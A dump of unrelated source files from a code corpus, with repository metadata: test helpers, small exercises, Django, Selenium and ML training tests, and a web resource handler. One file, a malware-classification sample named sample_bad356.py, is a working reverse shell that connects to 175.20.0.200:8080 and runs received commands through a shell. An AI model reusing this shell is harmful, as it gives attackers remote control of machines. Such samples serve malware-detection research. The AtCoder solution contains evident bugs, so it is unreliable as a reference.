            'security_flag': security_flag,
        }
        crash_data = {
            'crash_revision': version,
            'signature': signature,
            'platform': platform,
            'stack_trace': stack_trace,
            'regression_range': regression_range,
            'crash_identifiers': crash_identifiers,
            'customized_data': customized_data
        }
        if redo:
            crash_data['redo'] = True
        # This insertion of client_id is used for debugging ScheduleNewAnalysis.
        if client_id is not None:  # pragma: no cover
            crash_data['client_id'] = client_id
        return crash_data

    def GetDummyChromeCrashData(
            self, client_id=CrashClient.CRACAS, version='1', signature='signature',
            platform='win', stack_trace=None, regression_range=None, channel='canary',
            historical_metadata=None, process_type='browser'):
        """Build a Cracas/Fracas-style crash_data dict; every field overridable."""
        crash_identifiers = {
            'chrome_version': version,
            'signature': signature,
            'channel': channel,
            'platform': platform,
            'process_type': process_type,
        }
        customized_data = {
            'historical_metadata': historical_metadata,
            'channel': channel,
        }
        crash_data = {
            'chrome_version': version,
            'signature': signature,
            'platform': platform,
            'stack_trace': stack_trace,
            'regression_range': regression_range,
            'crash_identifiers': crash_identifiers,
            'customized_data': customized_data
        }
        # This insertion of client_id is used for debugging ScheduleNewAnalysis.
        if client_id is not None:  # pragma: no cover
            crash_data['client_id'] = client_id
        return crash_data

    def GetMockLog(self):
        """Return a fresh MockLog that records Log() calls in memory."""
        return MockLog()
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
baaf2f9367b44c93bdb2ea25862bb10a4d3d14a2
|
15ce00a910f5404f1ab3d6eb59334c26c5708748
|
/functions/keyword_only.py
|
cbbca0266fc6ae00ec778c065a99907bc58b6732
|
[] |
no_license
|
calazans10/algorithms.py
|
3307be25920428b33e784229c2aa727ac4225423
|
b8b0495fe34645b45aa5366416c1f80d87d18a3b
|
refs/heads/master
| 2020-05-17T13:27:58.481732
| 2013-07-21T13:31:39
| 2013-07-21T13:31:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
# -*- coding: utf-8 -*-
def total(initial=5, *numbers, vegetables):
    """Sum *initial*, any extra positional numbers, and the mandatory
    keyword-only *vegetables* count."""
    return initial + sum(numbers) + vegetables
print(total(10, 1, 2, 3, vegetables=50))
print(total(10, 1, 2, 3, vegetables=10))
|
[
"calazans10@gmail.com"
] |
calazans10@gmail.com
|
4db681565b71e2d02636d8c2ff90e16398465c69
|
401ea01ffb848f1eabd8aa17690ec1ff5dc8e6bd
|
/test/test_self_user.py
|
6ef6283a00a67b2ebbd837e2bb6a9c8afd01890c
|
[] |
no_license
|
bbrangeo/python-api-client
|
735acda3627d7a0ddd78ecb1e9617bb4082c9001
|
c2481e0cd012a41aeceefdce289d48509540b909
|
refs/heads/master
| 2020-03-14T18:24:20.888631
| 2018-04-30T14:47:47
| 2018-04-30T14:47:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
# coding: utf-8
"""
BIMData API
BIMData API documentation # noqa: E501
OpenAPI spec version: v1
Contact: contact@bimdata.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import bimdata_api_client
from bimdata_api_client.models.self_user import SelfUser # noqa: E501
from bimdata_api_client.rest import ApiException
class TestSelfUser(unittest.TestCase):
    """SelfUser unit test stubs (auto-generated scaffold)."""

    def setUp(self):
        pass  # nothing to prepare for these stubs

    def tearDown(self):
        pass  # nothing to clean up

    def testSelfUser(self):
        """Test SelfUser"""
        # FIXME: construct object with mandatory attributes with example values
        # model = bimdata_api_client.models.self_user.SelfUser()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
|
[
"hugo.duroux@gmail.com"
] |
hugo.duroux@gmail.com
|
366a391f8c2df41752f3272eb3d7db8337b7d0fe
|
e3840576e475c42160e914487ba91c1defc0b42f
|
/abc_155_D.py
|
8b0cb0d8037837a3e05322550b9f2afb2c20e146
|
[] |
no_license
|
Kuroboo100/atcoder
|
35f92e1a6001430bd96535799594573add78f5db
|
280562ef3f963b24f79b56204ba5a1b35ce84b69
|
refs/heads/master
| 2022-11-25T13:17:02.280672
| 2020-08-03T13:36:40
| 2020-08-03T13:36:40
| 269,625,592
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,146
|
py
|
def mul_minus(m,p,k):
    """
    m, p = the list of negative numbers and the list of positive numbers
    (arguments are given in minus-then-plus order).
    Returns the k-th smallest product formed by pairing elements of m and p.
    (Docstring translated from Japanese.)
    """
    # largest positives first, so m[0]*p[0] is the most-negative product
    p.sort(reverse=True)
    m_tmp=0
    p_tmp=0
    i=0
    mul=[m[0]*p[0]]
    while i<k:
        # candidates: advance along the positives or along the negatives
        if p_tmp+1<len(p):
            can_1=m[m_tmp]*p[p_tmp+1]
        if m_tmp+1<len(m):
            can_2=m[m_tmp+1]*p[p_tmp]
        # NOTE(review): can_1/can_2 may be unbound (NameError) or stale when
        # either index has hit the end of its list — confirm callers guarantee
        # k never walks past the frontier of valid pairs.
        if can_1>=can_2:
            m_tmp=m_tmp+1
        else:
            p_tmp=p_tmp+1
        mul.append(m[m_tmp]*p[p_tmp])
        i+=1
    return m[m_tmp]*p[p_tmp]
def mul_plus(m,p,k):
    """
    m, p = the list of negative numbers and the list of positive numbers
    (arguments are given in minus-then-plus order).
    Returns the k-th smallest product among same-sign pairs (all positive).
    (Docstring translated from Japanese.)
    """
    # NOTE(review): BUG — list.sort() has no 'reversed' keyword; this raises
    # TypeError at runtime. Presumably reverse=True was intended.
    m.sort(reversed=True)
    # tmp holds [small-minus, large-minus, small-plus, large-plus] indices,
    # but the scalar copies below are never re-synced with tmp afterwards.
    tmp=[0,1,0,1]
    sm_tmp=tmp[0]
    lm_tmp=tmp[1]
    sp_tmp=tmp[2]
    lp_tmp=tmp[3]
    i=0
    can=[0,0,0,0]
    mul=[]
    while i<k:
        # four candidate moves: advance either index in either sign bucket
        if sm_tmp+1!=lm_tmp and sm_tmp+1<len(m):
            can[0]=m[sm_tmp+1]*m[lm_tmp]
        if lm_tmp+1<len(m):
            can[1]=m[sm_tmp]*m[lm_tmp+1]
        if sp_tmp+1!=lp_tmp and sp_tmp+1<len(p):
            can[2]=p[sp_tmp+1]*p[lp_tmp]
        if lp_tmp+1<len(p):
            can[3]=p[sp_tmp]*p[lp_tmp+1]
        # NOTE(review): BUG — can_1 and can_2 are never defined in this
        # function (they belong to mul_minus); this is a NameError at runtime.
        if can_1>=can_2:
            lm_tmp+=1
        else:
            sm_tmp+=1
        j=can.index(min(can))
        tmp[j]+=1
        i+=1
        mul.append(min(can))
    return min(can)
def main():
    """Solve ABC155 D: the K-th smallest pairwise product of the input.

    Reads N, K and then N integers from stdin, partitions the values by
    sign, and dispatches to mul_minus / mul_plus depending on which sign
    bucket the K-th product falls into (negative products sort first,
    then zeros, then positives).
    """
    N, K = map(int, input().strip().split())
    A = list(map(int, input().strip().split()))
    A.sort()
    minus, zero, plus = [], [], []
    for value in A:
        if value < 0:
            minus.append(value)
        elif value == 0:
            # BUG FIX: was `zero.apppend(...)` — an AttributeError at runtime
            zero.append(value)
        else:
            plus.append(value)
    # counts of products that are negative / zero / positive
    num_minus = len(minus) * len(plus)
    num_zero = len(zero) * len(minus) + len(zero) * len(plus)
    # NOTE(review): num_zero ignores zero*zero pairs and num_plus counts
    # ordered pairs — confirm against the intended pairing convention.
    num_plus = len(plus) * (len(plus) - 1) + len(minus) * (len(minus) - 1)
    if K <= num_minus:
        return mul_minus(minus, plus, K)
    elif num_minus < K <= num_minus + num_zero:
        return 0
    else:
        k = K - num_minus - num_zero
        return mul_plus(minus, plus, k)

if __name__ == "__main__":
    print(main())
|
[
"yuki.kubota.0223@gmail.com"
] |
yuki.kubota.0223@gmail.com
|
6729ca87ad8b65a551fd5f41d6443586e13baa15
|
4c9580b2e09e2b000e27a1c9021b12cf2747f56a
|
/chapter06/chapter06/wsgi.py
|
3e88f160f773a7fc27dbdb8429834ad511c1267e
|
[] |
no_license
|
jzplyy/xiaoyue_mall
|
69072c0657a6878a4cf799b8c8218cc7d88c8d12
|
4f9353d6857d1bd7dc54151ca8b34dcb4671b8dc
|
refs/heads/master
| 2023-06-26T02:48:03.103635
| 2021-07-22T15:51:07
| 2021-07-22T15:51:07
| 388,514,311
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
"""
WSGI config for chapter06 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before building the handler
# (setdefault so an externally provided value wins).
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'chapter06.settings')
# Module-level WSGI callable that servers (gunicorn, uWSGI, ...) look up.
application = get_wsgi_application()
|
[
"jzplyy@126.com"
] |
jzplyy@126.com
|
5d8ebf6a2f375bd1c7c82b768a5185bcd628005f
|
b580fd482147e54b1ca4f58b647fab016efa3855
|
/host_im/mount/malware-classification-master/samples/virus/sample_bad356.py
|
a7091ad0c1ea2d013487c02faa2df366dff3846f
|
[] |
no_license
|
Barnsa/Dissertation
|
1079c8d8d2c660253543452d4c32799b6081cfc5
|
b7df70abb3f38dfd446795a0a40cf5426e27130e
|
refs/heads/master
| 2022-05-28T12:35:28.406674
| 2020-05-05T08:37:16
| 2020-05-05T08:37:16
| 138,386,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
import zlib
import tarfile
import socket
import crypt
import lzma
import subprocess
import gzip
import bz2
import hmac
import hashlib
import threading
import zipfile
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
|
[
"barnsa@uni.coventry.ac.uk"
] |
barnsa@uni.coventry.ac.uk
|
7b06911905dd515116322f0cffab02dde6d356fd
|
3a6d382503e11753dd81b291145847a2eabb8ec6
|
/experimental/dsmith/scrapheap/handcheck-crashes.py
|
6bd9c728da3084f4cc4cfb8f5c3850d0b9dcd044
|
[] |
no_license
|
QuXing9/phd
|
7e6f107c20e0b3b1de2b25eb99e0b640a4a0bfcf
|
58ba53b6d78515ed555e40527f6923e28941cc19
|
refs/heads/master
| 2022-02-27T03:29:05.126378
| 2019-10-22T02:46:57
| 2019-10-22T02:46:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,168
|
py
|
#!/usr/bin/env python
import random
import sys
from argparse import ArgumentParser
from dsmith import db
from dsmith.db import *
def yes_no_or_skip(question, default="skip"):
    """Ask a yes/no/skip question via input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
    It must be "yes", "no", "skip" (the default) or None (meaning
    an answer is required of the user).

    Returns the canonical string "yes", "no" or "skip" (not a bool —
    the original docstring's True/False claim did not match the code).
    """
    # map every accepted abbreviation to its canonical answer
    valid = {"yes": "yes", "y": "yes", "ye": "yes",
             "no": "no", "n": "no",
             "skip": "skip", "ski": "skip", "sk": "skip", "s": "skip", }
    if default is None:
        prompt = "[y/n/s]"
    elif default == "yes":
        prompt = "[Y/n/s]"
    elif default == "no":
        prompt = "[y/N/s]"
    elif default == "skip":
        prompt = "[y/n/S]"
    else:
        raise ValueError("invalid default answer: '%s'" % default)
    # re-prompt until a recognized answer (or the default) is given
    while True:
        sys.stdout.write(f"{question} {prompt} ")
        choice = input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            sys.stdout.write(f"Invalid input, select form {prompt}.\n")
def handcheck(recheck=False, include_all=False):
    """Interactively review gpuverified CLgen kernels one at a time.

    Picks a random unreviewed kernel, prints its source, asks the user
    whether it is valid, records the verdict, and recurses until no
    candidates remain.

    :param recheck: also include kernels that were already hand-checked.
    :param include_all: include all kernels, not just wrong-code results.
    """
    program = None
    with Session() as session:
        # candidate kernels: gpuverified programs joined to their results
        q = session.query(CLgenProgram).distinct() \
            .join(cl_launcherCLgenResult,
                  cl_launcherCLgenResult.program_id == CLgenProgram.id) \
            .filter(CLgenProgram.gpuverified == 1)
        if not include_all:
            q = q.filter(cl_launcherCLgenResult.status == 0,
                         cl_launcherCLgenResult.classification == "Wrong code")
        if not recheck:
            q = q.filter(CLgenProgram.handchecked == None)
        num_todo = q.count()
        if num_todo:
            # pick one candidate uniformly at random
            program = q.limit(1).offset(random.randint(0, num_todo - 1)).first()
            print()
            print(f"{num_todo} kernels to check")
            print("=====================================")
            print(program.src)
            print()
            answer = yes_no_or_skip("Is this a valid kernel?")
            if answer == "skip":
                print("skip")
            else:
                valid = answer == "yes"
                print(valid)
                print()
                program.handchecked = 1 if valid else 0
    # next check
    # NOTE(review): tail recursion — a very long review session could hit
    # Python's recursion limit; a while-loop would be safer.
    if program:
        handcheck(recheck=recheck, include_all=include_all)
def main():
    """CLI entry point: parse flags, connect to the database, run handcheck."""
    parser = ArgumentParser(description="Collect difftest results for a device")
    parser.add_argument("-H", "--hostname", type=str, default="cc1",
                        help="MySQL database hostname")
    parser.add_argument("-r", "--recheck", action="store_true",
                        help="include previously checked kernels")
    parser.add_argument("-a", "--all", dest="include_all", action="store_true",
                        help="include all kernels, not just wrong-code")
    args = parser.parse_args()
    # get testbed information
    db_hostname = args.hostname
    # db.init presumably opens the connection as a side effect; db_url unused
    db_url = db.init(db_hostname)
    try:
        handcheck(recheck=args.recheck, include_all=args.include_all)
        print("done.")
    except KeyboardInterrupt:
        # Ctrl-C ends the review session gracefully
        print("\nthanks for playing")

if __name__ == "__main__":
    main()
|
[
"chrisc.101@gmail.com"
] |
chrisc.101@gmail.com
|
1285800c62612518ff3de3b4bd6c8e0c608033a7
|
43a78f0bcd94f617d2c55e5019f3f3475580165d
|
/Udemy/Section 14/RunIETests.py
|
c99fb8fe83ce12a1bd5e1f56a6d79f70c50d2881
|
[] |
no_license
|
ctramm/Python_Training
|
2c35bd36b7cd1ea6598f915fafcf37ca048cf8ed
|
a0864a82bd6fb002c5f1a9aa7fb5d0b18341e6b0
|
refs/heads/master
| 2022-12-04T14:18:30.477562
| 2022-11-12T09:03:25
| 2022-11-12T09:03:25
| 171,736,957
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 255
|
py
|
"""
Section 14: Run Tests on IE
"""
from selenium import webdriver
class RunIETests:
    """Smoke test: launch Internet Explorer, load a page, then close it."""

    def test_method(self):
        browser = webdriver.Ie()
        browser.get("http://www.letskodeit.com")
        browser.close()


ie = RunIETests()
ie.test_method()
|
[
"ctramm@wiley.com"
] |
ctramm@wiley.com
|
c03c50aefa8eb8ec66658f37fee45ada353f7ca7
|
abad82a1f487c5ff2fb6a84059a665aa178275cb
|
/Codewars/8kyu/plural/Python/test.py
|
94c45c725af33da58916db900b0dd16972a85ea8
|
[
"MIT"
] |
permissive
|
RevansChen/online-judge
|
8ae55f136739a54f9c9640a967ec931425379507
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
refs/heads/master
| 2021-01-19T23:02:58.273081
| 2019-07-05T09:42:40
| 2019-07-05T09:42:40
| 88,911,035
| 9
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
# Python - 3.6.0
# Codewars fixture: `plural(n)` should be False only for exactly 1.
# `Test` and `plural` are injected by the Codewars runner, not defined here.
Test.assert_equals(plural(0), True, 'Plural for 0' )
Test.assert_equals(plural(0.5), True, 'Plural for 0.5')
Test.assert_equals(plural(1), False, '1 is singular!')
Test.assert_equals(plural(100), True, 'Plural for 100')
|
[
"d79523@hotmail.com"
] |
d79523@hotmail.com
|
37b2cfa3b1377db9d4b5444701cb38d3915fb1ed
|
b43103229a5fc3c49285818881eea7c42b8021c2
|
/python标准文档例题/真值测试.py
|
ef253daafb3daa0507df374ce37552f3428e6838
|
[] |
no_license
|
AlienWu2019/Alien-s-Code
|
34eaf60ae7ada4810c3564cee1a25371c1c3f7ad
|
983f68d13a81e6141779d26c84e371b2bf1d2e0d
|
refs/heads/master
| 2020-05-07T18:42:03.723993
| 2019-05-05T14:32:49
| 2019-05-05T14:32:49
| 180,777,724
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
import sys,math
def hash_fraction(m, n):
    """Hash of the rational m/n, following CPython's numeric-hash scheme
    (reduce modulo sys.hash_info.modulus using the modular inverse of n)."""
    p = sys.hash_info.modulus
    # strip common factors of the modulus so the inverse below exists
    while m % p == 0 and n % p == 0:
        m, n = m // p, n // p
    if n % p == 0:
        result = sys.hash_info.inf
    else:
        # Fermat's little theorem: pow(n, p-2, p) is 1/n modulo the prime p
        result = (abs(m) % p) * pow(n, p - 2, p) % p
    if m < 0:
        result = -result
    # -1 is reserved as CPython's internal error marker
    return -2 if result == -1 else result


def hash_float(x):
    """Hash of a float, consistent with hash_fraction for finite values."""
    if math.isnan(x):
        return sys.hash_info.nan
    if math.isinf(x):
        return sys.hash_info.inf if x > 0 else -sys.hash_info.inf
    return hash_fraction(*x.as_integer_ratio())
|
[
"q582946945@gmail.com"
] |
q582946945@gmail.com
|
56b651f1e53a535c948b8d7ba66fd0d05f4a02d9
|
060877bd2d5ad6ebb4b303e5dfae47afe9afd4f2
|
/mupit/combine_analyses.py
|
16e16a2626b9fdec431a1124cf4672d82dabe14d
|
[
"MIT"
] |
permissive
|
tianyunwang/mupit
|
f0cc92e1495144d2ea11ab60fbedbce70e6ba5e4
|
bca917af1e23b4466f636c6ae29479833c52efae
|
refs/heads/master
| 2020-03-26T04:27:13.342987
| 2018-08-02T23:18:42
| 2018-08-02T23:18:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,886
|
py
|
"""
Copyright (c) 2016 Genome Research Ltd.
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import math
import numpy
import pandas
from scipy.stats import chi2
def fishersMethod(x):
    """ function to combine p values, using Fisher's method

    Args:
        x: list of P-values for a gene (NaN entries are ignored)

    Returns:
        combined P-value, or NaN if no finite P-values were supplied
    """
    pvalues = [p for p in x if not math.isnan(p)]
    if not pvalues:
        return numpy.nan
    # Fisher: -2 * sum(ln p_i) follows chi-squared with 2k degrees of freedom
    statistic = -2 * sum(numpy.log(p) for p in pvalues)
    return chi2.sf(statistic, 2 * len(pvalues))
def combine_enrichment_and_clustering(enriched, clust):
    """ combine P values from enrichment and clustering tests into a single P value

    Args:
        enriched: dataframe of de novo enrichment results
        clust: dataframe of de novo clustering results

    Returns:
        a merged dataset where the P values have been combined
    """
    # read in p values from clustering analysis, only for genes with >1 mutation
    # pivot to one row per gene with a column per mutation category
    clust = pandas.pivot_table(clust, index=["gene_id"],
        columns=["mutation_category"], values="probability", aggfunc=numpy.mean)
    clust["hgnc"] = list(clust.index)
    columns = ["missense", "nonsense"]
    rename = dict(zip(columns, [ "p_{}_clust".format(x) for x in columns ]))
    clust = clust.rename(columns=rename)
    # merge the datasets (left join keeps every enrichment row)
    merged = enriched.merge(clust, how="left", on="hgnc")
    # calculate a combined p-value for each gene. We don't expect the
    # loss-of-function de novos to be clustered, so we don't use that.
    p_values = merged[["p_func", "p_missense_clust"]]
    merged["p_combined"] = p_values.apply(fishersMethod, axis=1)
    # calculate minimum p value across LoF and func + clustering tests
    merged["p_min"] = merged[["p_lof", "p_combined"]].min(axis=1)
    return merged
def combine_tests(meta_clust, meta_enrich, clust, enrich, pheno_path=None):
    """ find the most significant P value for each gene from the P values from
    different subsets and different tests.

    Args:
        meta_clust: path to clustering results for the meta-analysis subset
        meta_enrich: path to enrichment results for the meta-analysis subset
        clust: path to clustering results for the ddd only subset
        enrich: path to enrichment results for the ddd only subset
        pheno_path: path to phenotype similarity testing results

    Returns:
        data frame with the columns from all the datasets, as well as minimum
        P values from each subset for each gene, and overall minimum P values
        for each gene.
    """
    # load all the data files
    clust = pandas.read_table(clust, sep="\t")
    enrich = pandas.read_table(enrich, sep="\t")
    meta_clust = pandas.read_table(meta_clust, sep="\t")
    meta_enrich = pandas.read_table(meta_enrich, sep="\t")
    # combine enrichment + clustering within each subset
    meta = combine_enrichment_and_clustering(meta_enrich, meta_clust)
    ddd = combine_enrichment_and_clustering(enrich, clust)
    # if we have phenotypic similarity results, merge them with the other results
    if pheno_path is not None:
        phenotypes = pandas.read_table(pheno_path, sep="\t")
        ddd = ddd.merge(phenotypes, how="outer", on="hgnc")
    # need names that are more informative as same across files, add prefix
    columns = ["lof_indel", "lof_snv", "missense_indel", "missense_snv",
        "p_lof", "p_func", "p_missense_clust", "p_nonsense_clust", "gene_id",
        "p_combined", "hpo_similarity_p_value", "p_min"]
    ddd = ddd.rename(columns=dict(zip(columns, [ "ddd.{}".format(x) for x in columns ])))
    meta = meta.rename(columns=dict(zip(columns, [ "meta.{}".format(x) for x in columns ])))
    # merge together files, focusing on genes with DNMs in DDD
    merged = meta.merge(ddd, how="outer", on=["hgnc", "chrom"])
    # overall minimum: best P value across the DDD-only and meta subsets
    merged["p_min"] = merged[["ddd.p_min", "meta.p_min"]].min(axis=1)
    return merged
|
[
"jm33@sanger.ac.uk"
] |
jm33@sanger.ac.uk
|
74b7e9f0e76db5cc22f02e7a25cb6f5363f8c823
|
2d8113d4fa1560eefb3b9419c9494dfcbf12c2b5
|
/tests/simcse_test.py
|
320ea5abb3791b150acdb3c3ec2ee0b4cf0a94dd
|
[
"Apache-2.0"
] |
permissive
|
tiffen/DeepSE
|
6bcdcd2d64b8f9cf7643086395b6a2468d13445a
|
a7c47c5146827d50bc46a8ec30da6ee651a0c6b8
|
refs/heads/main
| 2023-06-17T12:37:06.947099
| 2021-07-16T03:08:36
| 2021-07-16T03:08:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,921
|
py
|
import os
import unittest
import tensorflow as tf
from deepse.simcse import SimCSE
from deepse.simcse_dataset import (HardNegativeSimCSEDataset,
SupervisedSimCSEDataset, UnsupSimCSEDataset)
from tokenizers import BertWordPieceTokenizer
PRETRAINED_MODEL_PATH = os.environ['PRETRAINED_MODEL_PATH']
class SimCSETest(unittest.TestCase):
    """Smoke-trains each SimCSE variant (unsup / sup / hardneg) for 2 epochs
    on small local JSONL fixtures.

    Requires the PRETRAINED_MODEL_PATH environment variable (read at module
    level) to point at a directory containing the Chinese RoBERTa checkpoint.
    """

    def test_unsup_simcse_train(self):
        # unsupervised variant: positives come from dropout noise
        model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
        model = SimCSE(model_path, mode='unsup')
        tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
        dataset = UnsupSimCSEDataset(tokenizer)
        train_dataset = dataset(
            input_files=['data/simcse_unsup.jsonl'],
            batch_size=4,
            bucket_boundaries=[20],
            buffer_size=10,
            repeat=100,
        )
        model.fit(
            train_dataset,
            validation_data=train_dataset,  # NOTE(review): validates on training data
            epochs=2,
            callbacks=[
                tf.keras.callbacks.ModelCheckpoint(
                    'data/simcse-unsup', monitor='loss', save_weights_only=False)
            ])

    def test_supervised_simcse_train(self):
        # supervised variant: labeled positive pairs
        model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
        model = SimCSE(model_path, mode='sup')
        tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
        dataset = SupervisedSimCSEDataset(tokenizer)
        train_dataset = dataset(
            input_files=['data/simcse_supervised.jsonl'],
            batch_size=4,
            bucket_boundaries=[20],
            buffer_size=10,
            repeat=100,
        )
        model.fit(
            train_dataset,
            validation_data=train_dataset,  # NOTE(review): validates on training data
            epochs=2,
            callbacks=[
                tf.keras.callbacks.ModelCheckpoint(
                    'data/simcse-sup', monitor='loss', save_weights_only=False)
            ])

    def test_hardneg_simcse_train(self):
        # hard-negative variant: triplets with explicit negatives
        model_path = os.path.join(PRETRAINED_MODEL_PATH, 'chinese_roberta_wwm_ext_L-12_H-768_A-12')
        model = SimCSE(model_path, mode='hardneg')
        tokenizer = BertWordPieceTokenizer.from_file(os.path.join(model_path, 'vocab.txt'))
        dataset = HardNegativeSimCSEDataset(tokenizer)
        train_dataset = dataset(
            input_files=['data/simcse_hardnegative.jsonl'],
            batch_size=4,
            bucket_boundaries=[20],
            buffer_size=10,
            repeat=100,
        )
        model.fit(
            train_dataset,
            validation_data=train_dataset,  # NOTE(review): validates on training data
            epochs=2,
            callbacks=[
                tf.keras.callbacks.ModelCheckpoint(
                    'data/simcse-hardneg', monitor='loss', save_weights_only=False)
            ])

if __name__ == "__main__":
    unittest.main()
|
[
"zhouyang.luo@gmail.com"
] |
zhouyang.luo@gmail.com
|
ceec8895dd948248f90dc1ce9b661b06dda07910
|
3a891a79be468621aae43defd9a5516f9763f36e
|
/desktop/core/ext-py/gunicorn-19.9.0/tests/requests/valid/008.py
|
379f9a2b8225da64fc0ce89d9df7284ea38de7a1
|
[
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"HPND",
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
oyorooms/hue
|
b53eb87f805063a90f957fd2e1733f21406269aa
|
4082346ef8d5e6a8365b05752be41186840dc868
|
refs/heads/master
| 2020-04-15T20:31:56.931218
| 2019-01-09T19:02:21
| 2019-01-09T19:05:36
| 164,998,117
| 4
| 2
|
Apache-2.0
| 2019-01-10T05:47:36
| 2019-01-10T05:47:36
| null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
# Expected parse of gunicorn test request 008: an HTTP/1.0 GET with an
# explicit Content-Length of 5 and body b"HELLO". `uri` is a helper supplied
# by the surrounding test harness (not defined in this file).
request = {
    "method": "GET",
    "uri": uri("/unusual_content_length"),
    "version": (1, 0),
    "headers": [
        ("CONTENT-LENGTH", "5")
    ],
    "body": b"HELLO"
}
|
[
"yingchen@cloudera.com"
] |
yingchen@cloudera.com
|
fc8410ca410351cbe027cc1f9b8543bdce3b987c
|
5653001ec8ec0bdcc8b9662f1411002cd52cb38d
|
/plugins/core/views/resource_server.py
|
732518e90b2b480e52c388850064fd9978c251fe
|
[] |
no_license
|
laravelbook/ajenti
|
409da009d8e4ff5c497627c2f131c56f3298b5ce
|
7cb64b36e3057cffc6ad58b189dc118a21c9d69d
|
refs/heads/master
| 2021-01-21T00:47:50.194075
| 2015-09-08T09:44:56
| 2015-09-08T09:45:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,134
|
py
|
import json
import os
from jadi import component
import aj
from aj.api.http import url, HttpPlugin
from aj.plugins import PluginManager
from aj.api.endpoint import endpoint
@component(HttpPlugin)
class ResourcesHandler(HttpPlugin):
    """Serves plugin static resources over HTTP.

    ``/resources/all.<type>`` concatenates every plugin's built CSS/JS bundle
    (plus two synthesized JS payloads); ``/resources/<plugin>/<path>`` serves
    a single file from a plugin's content directory.
    """

    def __init__(self, http_context):
        # type -> concatenated content; only consulted outside debug mode
        self.cache = {}
        self.use_cache = not aj.debug
        self.mgr = PluginManager.get(aj.context)

    @url(r'/resources/all\.(?P<type>.+)')
    @endpoint(page=True, auth=False)
    def handle_build(self, http_context, type=None):
        """Build (or return cached) aggregate resource of the given *type*."""
        if self.use_cache and type in self.cache:
            content = self.cache[type]
        else:
            content = ''
            if type in ['js', 'css']:
                # plain concatenation of each plugin's prebuilt bundle
                for plugin in self.mgr:
                    path = self.mgr.get_content_path(plugin, 'resources/build/all.%s' % type)
                    if os.path.exists(path):
                        content += open(path).read()
            if type == 'init.js':
                # expose the Angular module names declared by plugins
                ng_modules = []
                for plugin in self.mgr:
                    for resource in self.mgr[plugin]['info']['resources']:
                        if resource.startswith('ng:'):
                            ng_modules.append(resource.split(':')[-1])
                content = '''
                    window.__ngModules = %s;
                ''' % json.dumps(ng_modules)
            if type == 'partials.js':
                # pre-register every plugin HTML template in $templateCache
                content = '''
                    angular.module("core.templates", []);
                    angular.module("core.templates").run(
                        ["$templateCache", function($templateCache) {
                '''
                for plugin in self.mgr:
                    for resource in self.mgr[plugin]['info']['resources']:
                        if resource.endswith('.html'):
                            path = self.mgr.get_content_path(plugin, resource)
                            if os.path.exists(path):
                                template = open(path).read()
                                content += '''
                                    $templateCache.put("%s", %s);
                                ''' % (
                                    '%s/%s:%s' % (http_context.prefix, plugin, resource),
                                    json.dumps(template)
                                )
                content += '''
                    }]);
                '''
            self.cache[type] = content
        http_context.add_header('Content-Type', {
            'css': 'text/css',
            'js': 'application/javascript; charset=utf-8',
            'init.js': 'application/javascript; charset=utf-8',
            'partials.js': 'application/javascript; charset=utf-8',
        }[type])
        http_context.respond_ok()
        return http_context.gzip(content=content)

    @url(r'/resources/(?P<plugin>\w+)/(?P<path>.+)')
    @endpoint(page=True, auth=False)
    def handle_file(self, http_context, plugin=None, path=None):
